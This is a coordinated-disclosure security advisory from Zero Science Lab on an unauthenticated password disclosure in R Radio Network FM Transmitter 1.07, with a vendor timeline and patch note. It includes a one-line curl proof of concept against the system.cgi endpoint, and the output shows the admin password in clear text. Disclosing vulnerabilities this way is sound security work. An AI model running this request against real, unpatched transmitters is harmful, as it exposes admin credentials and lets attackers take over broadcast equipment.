Title: R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
Advisory ID: ZSL-2023-5802
Type: Local/Remote
Impact: Exposure of Sensitive Information, Security Bypass
Risk: (5/5)
Release Date: 03.12.2023
R Radio FM Transmitter that includes FM Exciter and FM Amplifier parameter setup.
The transmitter suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access.
R Radio Network - <http://www.pktc.ac.th>
1.07
CSBtechDevice
[09.10.2023] Vulnerability discovered.
[10.10.2023] Vendor contacted.
[10.10.2023] Vendor responds asking more details.
[11.10.2023] Sent details to the vendor.
[14.10.2023] Vendor confirms the issue, working on a patch.
[29.10.2023] Vendor releases version 1.09 to address this issue.
[03.12.2023] Coordinated public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://packetstormsecurity.com/files/176044/>
[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/275361>
[3] <https://www.exploit-db.com/exploits/51855>
[03.12.2023] - Initial release
[20.12.2023] - Added reference [1]
[01.02.2024] - Added reference [2]
[03.03.2024] - Added reference [3]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07
Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.
Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.
Tested on: CSBtechDevice
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php
09.10.2023
--
$ curl -s http://192.168.70.12/system.cgi
</p><title>System Settings</title>
...
...
Password for user 'admin'<td><input maxlength="10" name="pw" size="10" type="password" value="testingus"/></td>
...
...
$
</body></html>